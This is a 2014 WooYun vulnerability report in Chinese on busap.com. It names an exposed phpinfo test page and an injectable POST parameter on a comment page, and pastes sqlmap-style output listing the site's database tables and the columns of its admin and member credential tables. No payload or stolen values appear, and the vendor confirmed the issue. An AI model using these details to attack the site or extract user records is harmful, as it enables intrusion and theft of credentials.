当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053720

漏洞标题:巴士在线官网POST型注入及敏感信息泄露

相关厂商:busap.com

漏洞作者: diguoji

提交时间:2014-03-19 09:37

修复时间:2014-05-03 09:38

公开时间:2014-05-03 09:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-19: 细节已通知厂商并且等待厂商处理中
2014-03-19: 厂商已经确认,细节仅向厂商公开
2014-03-29: 细节向核心白帽子及相关领域专家公开
2014-04-08: 细节向普通白帽子公开
2014-04-18: 细节向实习白帽子公开
2014-05-03: 细节向公众公开

简要描述:

phpinfo信息泄露,一页面可type参数可注入。

详细说明:

http://www.busap.com/test.php

1.png


gpc为off 根目录等敏感信息泄露
http://www.busap.com/mybusmylife/comment.php 页面可POST注入

2.png


3.png


4.png


Database: busap
[103 tables]
+--------------------------+
| `[Table]adminsession` |
| `[Table]ads` |
| `[Table]announcements` |
| `[Table]attachments` |
| `[Table]attachmenttypes` |
| `[Table]blocks` |
| `[Table]cache_0` |
| `[Table]cache_4` |
| `[Table]cache_8` |
| `[Table]cache_9` |
| `[Table]cache_d` |
| `[Table]cache` |
| `[Table]categories` |
| `[Table]channels` |
| `[Table]crons` |
| `[Table]customfields` |
| `[Table]forums` |
| `[Table]friendlinks` |
| `[Table]members` |
| `[Table]message` |
| `[Table]modelcolumns` |
| `[Table]modelinterval` |
| `[Table]models` |
| `[Table]polls` |
| `[Table]prefields` |
| `[Table]reports` |
| `[Table]robotitems` |
| `[Table]robotlog` |
| `[Table]robotmessages` |
| `[Table]robots` |
| `[Table]rss` |
| `[Table]settings` |
| `[Table]sitemaplogs` |
| `[Table]spacecomments` |
| `[Table]spaceitems` |
| `[Table]spacenews` |
| `[Table]spacetags` |
| `[Table]styles` |
| `[Table]tagcache` |
| `[Table]tags` |
| `[Table]usergroups` |
| `[Table]userlog` |
| `[Table]words` |
| cctvmv_a_category |
| cctvmv_a_config |
| cctvmv_a_file |
| cctvmv_a_keyword |
| cctvmv_a_newsletter |
| cctvmv_a_page |
| cctvmv_a_partner_name |
| cctvmv_a_partner_url |
| cctvmv_a_provider |
| cctvmv_a_resolution |
| cctvmv_a_search_engine |
| cctvmv_a_site |
| cctvmv_a_vars_name |
| cctvmv_a_vars_value |
| cctvmv_archives |
| cctvmv_category |
| cctvmv_groups |
| cctvmv_ip_ignore |
| cctvmv_link_vp |
| cctvmv_link_vpv |
| cctvmv_newsletter |
| cctvmv_page |
| cctvmv_page_md5url |
| cctvmv_page_url |
| cctvmv_pdf_config |
| cctvmv_pdf_site_user |
| cctvmv_plugin_version |
| cctvmv_query_log |
| cctvmv_site |
| cctvmv_site_partner |
| cctvmv_site_partner_url |
| cctvmv_site_url |
| cctvmv_users |
| cctvmv_users_link_groups |
| cctvmv_vars |
| cctvmv_version |
| cctvmv_visit |
| mybusmylife4 |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| zhenai_couple |
| zhenai_vote |
| zt_message |
+--------------------------+
Database: busap
Table: uc_admins
[14 columns]
+-------------------+-----------------------+
| Column | Type |
+-------------------+-----------------------+
| allowadminapp | tinyint(1) |
| allowadminbadword | tinyint(1) |
| allowadmincache | tinyint(1) |
| allowadmincredits | tinyint(1) |
| allowadmindb | tinyint(1) |
| allowadmindomain | tinyint(1) |
| allowadminlog | tinyint(1) |
| allowadminnote | tinyint(1) |
| allowadminpm | tinyint(1) |
| allowadminsetting | tinyint(1) |
| allowadmintag | tinyint(1) |
| allowadminuser | tinyint(1) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+-------------------+-----------------------+
Database: busap
Table: uc_members
[12 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+---------------+-----------------------+
database management system users roles:
[*] 'busap'@'%' [1]:
role: USAGE
低权限

5.png

漏洞证明:

如上

修复方案:

过滤,还有不少洞

版权声明:转载请注明来源 diguoji@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-03-19 13:19

厂商回复:

感谢乌云的提示

最新状态:

暂无


漏洞评价:

评论